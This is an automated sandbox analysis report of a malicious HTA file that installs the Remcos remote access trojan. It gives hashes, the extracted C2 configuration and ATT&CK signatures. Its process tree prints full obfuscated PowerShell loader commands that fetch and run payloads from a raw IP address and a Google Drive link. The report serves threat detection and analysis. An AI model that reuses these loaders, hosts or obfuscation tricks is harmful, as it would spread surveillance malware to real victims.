Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-10-2024 12:55

General

  • Target

    goodthingsbestviewtoseethebetterthingswithmygirlfriend.hta

  • Size

    131KB

  • MD5

    3ea42c07ceb45070164bd1f477a88133

  • SHA1

    d7962b4b8f067a50c6efac4fcf0afa3ff60e0eb5

  • SHA256

    bf19247ad0e4d4f0e932be829ab5ef3c0921c637faa85844aa22975126b5d0c7

  • SHA512

    5fcb742dc63d4a48fee28fd776a7bd48089f4ae29cf560c1ebd98f282fd023810b5fdc0b93ed7d6f3fd1eec36e4614d898e2319a20c5aa94b4b043d887f0e9f1

  • SSDEEP

    96:4vCt7ttKm+IgwtKm31IgMhCY3Ck6j8PtKmOYtKm5hz5OIgTUtKm8Q:4vCFttKmUwtKmX3YTtKmBtKmewtKm8Q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

remcos

Botnet

RemoteHost

C2

cokka.duckdns.org:9764

cokka.duckdns.org:9674

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TTZ00A

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodthingsbestviewtoseethebetterthingswithmygirlfriend.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\SysWOW64\wINDoWSpoWERSHELl\V1.0\pOWERShELl.eXe
      "C:\Windows\systEm32\wINDoWSpoWERSHELl\V1.0\pOWERShELl.eXe" "PowErSheLl -EX BYPaSS -nOP -w 1 -c deVicEcReDeNTIAldEploYMENT ; IeX($(IeX('[syStEm.TeXT.EnCOdinG]'+[cHaR]0X3A+[CHar]0X3a+'uTF8.gETSTrInG([SysTEM.coNveRt]'+[chaR]0x3a+[chaR]0x3a+'frOMBasE64STrinG('+[cHar]0X22+'JE9RUTJhRjV4SSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iRVJEZWZpbml0aU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtFTXAsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdRbW5rRHRWb3RaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNBRmssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElQUW12S1dJYik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVmVUUndQak11IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVoVVBFWlggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1FRMmFGNXhJOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTAxLjIxLzMyMy9jcmVhdGVkYmVzdHRoaW5nc3doaWNobmljZWFuZGdvb2Rmb3JiZXN0dG9kby50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aGljaG5pY2VhbmRnb29kZm9yYmVzdHRvLnZiUyIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2hpY2huaWNlYW5kZ29vZGZvcmJlc3R0by52YlMi'+[CHaR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYPaSS -nOP -w 1 -c deVicEcReDeNTIAldEploYMENT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3596
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u4i5hdnx\u4i5hdnx.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4164
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8B0A.tmp" "c:\Users\Admin\AppData\Local\Temp\u4i5hdnx\CSC9A6E707D41CD4D15A6B9B04465A49EA2.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3464
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdbestthingswhichniceandgoodforbestto.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4368
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnV3ZLaW1hZ2VVcmwgPSBjajRodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWMnKyc/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1ciBjajQ7V3ZLd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtXdktpbWFnZUJ5dGVzID0gV3ZLd2ViQ2xpZScrJ250LkRvd25sb2FkRGF0YShXdktpbWFnZVVybCk7V3ZLaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HJysnZXRTdHJpbmcoV3ZLaW1hZ2VCeXRlcyk7V3ZLc3RhcnRGbGFnID0gY2o0PDxCQVNFNjRfU1RBUlQ+PmNqNDtXdktlbmRGbGFnID0gY2o0PDxCQVNFNjRfRU5EPj5jajQ7V3ZLcycrJ3RhcnRJbmRleCAnKyc9IFd2S2ltYWdlVGV4dC5JbmRleE9mKFd2S3N0YXJ0RmxhZyk7V3ZLZW5kSW5kZXggPSBXdktpbWFnZVRleHQuSW5kZXhPZihXdktlbmRGbGFnKTtXdktzdGFydEluZGV4IC1nZSAwIC1hbmQgV3ZLZW5kSW5kZXggLWd0IFd2S3N0YXJ0SW5kZXg7V3ZLc3RhcnRJbmRlJysneCArPSBXdktzdGFydEZsYWcuTGVuZ3RoO1d2S2Jhc2U2NExlbmd0aCA9IFd2S2VuZEluZGV4IC0gV3ZLc3RhcnRJbmRleDtXdktiYXNlNjRDb21tYW5kID0gV3ZLaW1hZycrJ2VUZXh0LlN1YnN0cmluZyhXdktzdGFydEluZGV4LCBXdktiYXNlNjRMZW5ndGgpO1cnKyd2S2Jhc2U2NFInKydldmVyc2VkID0gLWpvaW4gKFd2SycrJ2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxdTggRm9yRWFjaC1PYmplY3QgeyBXdktfIH0pWy0xLi4tKFd2S2Jhc2U2NENvJysnbW1hbmQuTGVuZ3RoKV07V3ZLY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhXdktiYXNlNjRSZXZlcnNlZCk7V3ZLbCcrJ29hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMbycrJ2FkKFd2S2NvbW1hbmRCeXRlcyk7V3ZLJysndmFpTWV0aG9kICcrJz0gW2RubGliLklPLkhvbScrJ2VdLkdldE1lJysndGhvZChjajRWQUljajQpO1d2S3ZhaU1ldGgnKydvZC5JbnZva2UoV3YnKydLbnVsbCwgQChjajR0eHQuQ0NNUlIvMzIzLzEyLjEwMS4zLjI5MS8vOnB0dGhjajQsIGNqNGRlc2F0aXZhZG9jajQsIGNqNGRlc2F0aXZhZG9jajQsIGNqNGRlc2F0aXZhZG9jajQsIGNqNENhc1BvbGNqNCwgY2o0ZGVzYXRpdmFkb2NqNCwgY2o0JysnZGVzYXQnKydpdmFkb2NqNCxjajRkZXNhdGl2YWRvY2o0JysnLGNqNGRlc2F0aXZhZG9jajQsY2o0ZGVzYXRpdmFkb2NqNCxjajRkZXNhdGl2YWRvY2onKyc0LGNqNGRlc2F0aXZhZG9jajQsY2o0MWNqNCxjajRkZXNhdGl2YScrJ2RvY2o0KSk7JykgLVJlUExBY2UgICcxdTgnLFtDSEFSXTEyNCAtUmVQTEFjZSAgKFtDSEFSXTg3K1tDSEFSXTExOCtbQ0hBUl03NSksW0NIQVJdMzYtY1JFUGxBQ2UgKFtDSEFSXTk5K1tDSEFSXTEwNitbQ0hBUl01MiksW0NIQVJdMzkpIHwgJiAoICRwc0hPTUVbMjFdKyRwU2hPbUVbMzRdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4656
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('WvKimageUrl = cj4https://drive.google.com/uc'+'?export=download&id=1AIVgJJJv1F6vS4sU'+'OybnH-sDvUhBYwur cj4;WvKwebClient = New-Object System.Net.WebClient;WvKimageBytes = WvKwebClie'+'nt.DownloadData(WvKimageUrl);WvKimageText = [System.Text.Encoding]::UTF8.G'+'etString(WvKimageBytes);WvKstartFlag = cj4<<BASE64_START>>cj4;WvKendFlag = cj4<<BASE64_END>>cj4;WvKs'+'tartIndex '+'= WvKimageText.IndexOf(WvKstartFlag);WvKendIndex = WvKimageText.IndexOf(WvKendFlag);WvKstartIndex -ge 0 -and WvKendIndex -gt WvKstartIndex;WvKstartInde'+'x += WvKstartFlag.Length;WvKbase64Length = WvKendIndex - WvKstartIndex;WvKbase64Command = WvKimag'+'eText.Substring(WvKstartIndex, WvKbase64Length);W'+'vKbase64R'+'eversed = -join (WvK'+'base64Command.ToCharArray() 1u8 ForEach-Object { WvK_ })[-1..-(WvKbase64Co'+'mmand.Length)];WvKcommandBytes = [System.Convert]::FromBase64String(WvKbase64Reversed);WvKl'+'oadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(WvKcommandBytes);WvK'+'vaiMethod '+'= [dnlib.IO.Hom'+'e].GetMe'+'thod(cj4VAIcj4);WvKvaiMeth'+'od.Invoke(Wv'+'Knull, @(cj4txt.CCMRR/323/12.101.3.291//:ptthcj4, cj4desativadocj4, cj4desativadocj4, cj4desativadocj4, cj4CasPolcj4, cj4desativadocj4, cj4'+'desat'+'ivadocj4,cj4desativadocj4'+',cj4desativadocj4,cj4desativadocj4,cj4desativadocj'+'4,cj4desativadocj4,cj41cj4,cj4desativa'+'docj4));') -RePLAce '1u8',[CHAR]124 -RePLAce ([CHAR]87+[CHAR]118+[CHAR]75),[CHAR]36-cREPlACe ([CHAR]99+[CHAR]106+[CHAR]52),[CHAR]39) | & ( $psHOME[21]+$pShOmE[34]+'x')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4280
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:3048

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    102B

    MD5

    46c1fe14e98a1491e77ab26eaa952e9c

    SHA1

    b1f8b8372b4a586849dbc0e39d9c45168dcbd591

    SHA256

    583c96de2db1ad8e4b7348ba3b2ca46c2a87ffa79efaca2af9b896225ccae5f8

    SHA512

    c14cdaf159f89f1739a31a1ae891e3f81115127ed6c2e99230c85191ae17b22e742120c0f31466b5e27af74d052550429428b4ad89c181bb37afe87f133f3961

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWERShELl.eXe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    03b5fe0eaabdb815ae3dda07f6b463e8

    SHA1

    6830f26c0fcb1e944c12ab995a653b690af7f992

    SHA256

    f09013e14053b3b12676292b5021a41f999a319e83839013005245e4f623e016

    SHA512

    49d2fc0ec457da3f2cee892ba1ab865647ca06184bfd8695fc1f7a4b4e976a41c6ab675e7826cfbd577e31234e3dba6231bb803c85abb380b79188cb16dfeef6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    c605ee650d610e19b09f83354895f3c7

    SHA1

    d924802655fcd23ae9fa89df0a08f4e909946693

    SHA256

    6ced977d8aef9174c5854c120e9e1b23e005ee8e55e24a0db6c00f5a41ace286

    SHA512

    a5579db2e360317508ba947dfc0d57261e9bd5b8c2ff86f789ceaa2eb34e667a1982584263e0d441e037c39662f88a98f78aef00e2604764388a6ade860dbdfc

  • C:\Users\Admin\AppData\Local\Temp\RES8B0A.tmp

    Filesize

    1KB

    MD5

    b5403b99ad900312bbeedb0dcf3b5cfa

    SHA1

    83d6680fcdf8fb0f22e84debd94b8c15d0118cb2

    SHA256

    8cec9ee2a7f4f2573852687b8e0b7d7282ca086b33284a0978669317845b5c9a

    SHA512

    cb2b4a12ab81bb2d26a7f477df38ff71e1905ca7e01413ff57cf037ef076dd95b7e110044851900985f28a4f3b2b25414467f133b35466283a59b93e39cecd02

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_woxl15sa.ulp.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\u4i5hdnx\u4i5hdnx.dll

    Filesize

    3KB

    MD5

    d5fea55fff0ed922b7a25fd080351582

    SHA1

    96d1b0162b7be76ba727f7743f93b01d91e86064

    SHA256

    ed2aa411713395f06c3dd70fe424f7d958790fd08a415870b265750eb8feaf82

    SHA512

    501a62d301134c6a800cc4b70c97b513a89f443249633df9043041f333fc8b32793c6acef5492170d8bda92c8bf57a3804004c654dd6425620550c4c93bbd4c4

  • C:\Users\Admin\AppData\Roaming\createdbestthingswhichniceandgoodforbestto.vbS

    Filesize

    135KB

    MD5

    a0fb5d40f0945576cfb2c427908c3f14

    SHA1

    c8908562726972f9020e37bc6fdac3e13cfd7164

    SHA256

    ee1192fe532bd91046843793a3a614b6472379613a15a366f40e452e0e3d357c

    SHA512

    cc3e77612f9c89379f988bb5ee00348a76851e2a841b0222102c05682b68468228de073ee325625c953457c35a63ad1d69c66cc057906688b7db3c7f8ef60618

  • \??\c:\Users\Admin\AppData\Local\Temp\u4i5hdnx\CSC9A6E707D41CD4D15A6B9B04465A49EA2.TMP

    Filesize

    652B

    MD5

    f18ec8bc0905794155dba04cad092819

    SHA1

    a0607e7a63431cf8849173fd46877482fc859c7b

    SHA256

    5a7828f639b6a4b9d1eab38e377143468f2906a27c763337ea3dea011b03043e

    SHA512

    eec55c6688834b6cd15b0c3cbe5cd2f42c2726e1efa96f08c629911f24bb44185e5dfac2c224e8bebefc92c0c2a56a5dd54685a0fadcf9505576f544b1e27521

  • \??\c:\Users\Admin\AppData\Local\Temp\u4i5hdnx\u4i5hdnx.0.cs

    Filesize

    467B

    MD5

    b91f1449c07766269c3857b9fffc1783

    SHA1

    6fe0b26d151d34061e2f18c1a3fe72280bdfb48a

    SHA256

    fd8dc4ff769b585dbfc10a55a982eaddaa2051bec05a585b900e844e292fa6bf

    SHA512

    087263f9bc6648c08260b133e41b6bbd730c1c30e71b9cb24bd12a49ae01bbb65dfb76e01d17ae440d8a1a6d6d6e23c1f1be343853daf5f938ab1df1696ccb93

  • \??\c:\Users\Admin\AppData\Local\Temp\u4i5hdnx\u4i5hdnx.cmdline

    Filesize

    369B

    MD5

    c3dcc1d49c1d2fea7ac0fec37e84e47d

    SHA1

    fd9df0f555e066ce8071442309b05371528ea035

    SHA256

    f19cfea5a6b8020aadfb106bc15acc03df8ddb2fdd4d27f15a69ccda6273c33a

    SHA512

    e6ab8f79327052f430ef522385e719ea71616588f04bf21f62906c62a662c0271043db38e130217e7c8cb283c08569973ab0bb84eee60cfd01f0567d6a11178b

  • memory/2212-4-0x0000000071040000-0x00000000717F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2212-19-0x0000000006590000-0x00000000065DC000-memory.dmp

    Filesize

    304KB

  • memory/2212-5-0x00000000055C0000-0x00000000055E2000-memory.dmp

    Filesize

    136KB

  • memory/2212-0-0x000000007104E000-0x000000007104F000-memory.dmp

    Filesize

    4KB

  • memory/2212-79-0x0000000071040000-0x00000000717F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2212-7-0x0000000005F60000-0x0000000005FC6000-memory.dmp

    Filesize

    408KB

  • memory/2212-3-0x00000000056A0000-0x0000000005CC8000-memory.dmp

    Filesize

    6.2MB

  • memory/2212-6-0x0000000005D40000-0x0000000005DA6000-memory.dmp

    Filesize

    408KB

  • memory/2212-72-0x00000000087F0000-0x0000000008D94000-memory.dmp

    Filesize

    5.6MB

  • memory/2212-71-0x0000000007920000-0x0000000007942000-memory.dmp

    Filesize

    136KB

  • memory/2212-65-0x0000000006B10000-0x0000000006B18000-memory.dmp

    Filesize

    32KB

  • memory/2212-2-0x0000000071040000-0x00000000717F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2212-1-0x0000000004FB0000-0x0000000004FE6000-memory.dmp

    Filesize

    216KB

  • memory/2212-18-0x0000000006560000-0x000000000657E000-memory.dmp

    Filesize

    120KB

  • memory/2212-8-0x0000000005FD0000-0x0000000006324000-memory.dmp

    Filesize

    3.3MB

  • memory/3048-106-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-125-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-142-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-141-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-134-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-133-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-126-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-103-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-118-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-117-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-114-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-113-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-112-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-101-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-102-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3048-111-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3596-43-0x0000000007020000-0x000000000703A000-memory.dmp

    Filesize

    104KB

  • memory/3596-45-0x00000000072B0000-0x0000000007346000-memory.dmp

    Filesize

    600KB

  • memory/3596-40-0x0000000006E80000-0x0000000006E9E000-memory.dmp

    Filesize

    120KB

  • memory/3596-49-0x0000000007370000-0x000000000738A000-memory.dmp

    Filesize

    104KB

  • memory/3596-48-0x0000000007260000-0x0000000007274000-memory.dmp

    Filesize

    80KB

  • memory/3596-41-0x0000000006EF0000-0x0000000006F93000-memory.dmp

    Filesize

    652KB

  • memory/3596-42-0x0000000007670000-0x0000000007CEA000-memory.dmp

    Filesize

    6.5MB

  • memory/3596-50-0x00000000072A0000-0x00000000072A8000-memory.dmp

    Filesize

    32KB

  • memory/3596-29-0x0000000006EA0000-0x0000000006ED2000-memory.dmp

    Filesize

    200KB

  • memory/3596-44-0x0000000007080000-0x000000000708A000-memory.dmp

    Filesize

    40KB

  • memory/3596-30-0x000000006D900000-0x000000006D94C000-memory.dmp

    Filesize

    304KB

  • memory/3596-46-0x0000000007220000-0x0000000007231000-memory.dmp

    Filesize

    68KB

  • memory/3596-47-0x0000000007250000-0x000000000725E000-memory.dmp

    Filesize

    56KB

  • memory/4280-99-0x0000000007960000-0x0000000007ABA000-memory.dmp

    Filesize

    1.4MB

  • memory/4280-100-0x0000000018180000-0x000000001821C000-memory.dmp

    Filesize

    624KB